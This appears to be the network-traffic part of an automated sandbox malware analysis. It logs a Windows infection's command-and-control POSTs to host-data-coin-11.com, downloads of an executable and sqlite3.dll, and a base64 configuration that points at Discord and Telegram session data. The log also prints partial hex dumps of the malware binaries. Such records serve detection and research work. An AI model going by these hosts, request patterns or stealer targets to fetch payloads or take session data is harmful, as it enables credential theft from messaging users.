                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          3192.168.2.349833144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          30192.168.2.34979031.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.170495033 CET2414OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://ofikhxrblm.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 209
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.247138977 CET2428INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:57 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          31192.168.2.34979131.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.326373100 CET2508OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://iagotmptv.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 224
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.402375937 CET2619INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:57 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2bI:82OI<\FF2K90


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          32192.168.2.349792185.7.214.1718080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.473169088 CET2620OUTGET /6.php HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Host: 185.7.214.171:8080
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.536668062 CET2621INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:57 GMT
                                                                                                                                                                                                          Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                          Content-Transfer-Encoding: Binary
                                                                                                                                                                                                          Content-disposition: attachment; filename="bt1lujk3wsd863.exe"
                                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                          Data Raw: 35 34 65 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 23 4f a3 99 42 21 f0 99 42 21 f0 99 42 21 f0 0a 0c b9 f0 98 42 21 f0 f6 34 bf f0 88 42 21 f0 f6 34 8b f0 f6 42 21 f0 90 3a b2 f0 9a 42 21 f0 99 42 20 f0 28 42 21 f0 f6 34 8a f0 ae 42 21 f0 f6 34 bb f0 98 42 21 f0 f6 34 bc f0 98 42 21 f0 52 69 63 68 99 42 21 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 64 e9 b9 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 14 04 00 00 d6 33 00 00 00 00 00 50 4b 02 00 00 10 00 00 00 30 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 38 00 00 04 00 00 9d 17 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 13 04 00 28 00 00 00 00 70 37 00 90 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 00 64 22 00 00 30 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 13 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 0c 2a 33 00 00 30 04 00 00 8c 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 75 70 61 00 00 00 05 00 00 00 00 60 37 00 00 02 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 4e 00 00 00 70 37 00 00 50 00 00 00 a6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 de 56 00 00 00 c0 37 00 00 58 00 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii: 54e00MZ@!L!This program cannot be run in DOS mode.$#OB!B!B!B!4B!4B!:B!B (B!4B!4B!4B!RichB!PELd`3PK0@ 8(p7N7d"0@.text6 `.data*30@.vupa`7@.rsrcNp7P@@.relocV7X@B


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          33192.168.2.34979431.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.444822073 CET2989OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://gojbnwwiu.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 124
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.524622917 CET2990INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:59 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          34192.168.2.34979531.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.587815046 CET2991OUTGET /tratata.php HTTP/1.1
                                                                                                                                                                                                          Host: file-file-host4.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.663341999 CET2993INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.2
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:59 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=rd3dm5mqbrt7b88g82ka584gmv; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                          Data Raw: 63 34 0d 0a 4d 58 77 78 66 44 46 38 4d 58 78 45 61 58 4e 6a 62 33 4a 6b 66 44 42 38 4a 55 46 51 55 45 52 42 56 45 45 6c 58 47 52 70 63 32 4e 76 63 6d 52 63 54 47 39 6a 59 57 77 67 55 33 52 76 63 6d 46 6e 5a 56 78 38 4b 6e 77 78 66 44 42 38 4d 48 78 55 5a 57 78 6c 5a 33 4a 68 62 58 77 77 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 55 5a 57 78 6c 5a 33 4a 68 62 53 42 45 5a 58 4e 72 64 47 39 77 58 48 52 6b 59 58 52 68 58 48 77 71 52 44 67 33 4e 30 59 33 4f 44 4e 45 4e 55 51 7a 52 55 59 34 51 79 6f 73 4b 6d 31 68 63 43 6f 73 4b 6d 4e 76 62 6d 5a 70 5a 33 4d 71 66 44 46 38 4d 48 77 77 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: c4MXwxfDF8MXxEaXNjb3JkfDB8JUFQUERBVEElXGRpc2NvcmRcTG9jYWwgU3RvcmFnZVx8KnwxfDB8MHxUZWxlZ3JhbXwwfCVBUFBEQVRBJVxUZWxlZ3JhbSBEZXNrdG9wXHRkYXRhXHwqRDg3N0Y3ODNENUQzRUY4QyosKm1hcCosKmNvbmZpZ3MqfDF8MHwwfA==0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          35192.168.2.34979631.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.602085114 CET2992OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://axvhnmv.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 256
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.678738117 CET2993INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:59 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          36192.168.2.34979731.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.752026081 CET2994OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://pjiki.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 298
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.832946062 CET3009INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:59 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 50 df 41 d7 f7 22 82 23 e9 af 9a 56 29 e6 b7 4f 29 e3 b3 b7 6d f4 9d ba 5f a9 74 92 ca 31 46 5a 3c 02 49 d3 bb 55 ab e9 5d 8f ad d6 05 c0 60 9d d2 69 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 66I:82OB%,YR("XPA"#V)O)m_t1FZ<IU]`i0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          37192.168.2.34979831.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.755417109 CET2995OUTGET /sqlite3.dll HTTP/1.1
                                                                                                                                                                                                          Host: file-file-host4.com
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          Cookie: PHPSESSID=rd3dm5mqbrt7b88g82ka584gmv
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.814320087 CET2996INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.2
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:59 GMT
                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                          Content-Length: 645592
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Last-Modified: Wed, 08 Dec 2021 03:32:46 GMT
                                                                                                                                                                                                          ETag: "9d9d8-5d29a24b21380"
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 37 37 00 00 00 00 00 94 0b 00 00 00 c0 08 00 00 0c 00 00 00 46 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 39 00 00 00 00 00 04 05 00 00 00 d0 08 00 00 06 00 00 00 52 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 30 32 00 00 00 00 0d 01 00 00 00 e0 08 00 00 02 00 00 00 58 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 31 31 33 00 00 00 00 db 19 00 00 00 f0 08 00 00 1a 00 00 00
                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=Sv?!X` 8 L'p.text`0`.data@@.rdata$@@@.bss@.edata@0@.idataL@0.CRT@0.tls @0.reloc'(@0B/4`0@@B/19@@B/35MP@B/51`C`D@B/638@B/77F@B/89R@0B/102X@B/113


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          38192.168.2.34980231.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.248277903 CET4269OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://yajqqfxbs.net/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 236
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.327325106 CET4270INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:02 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
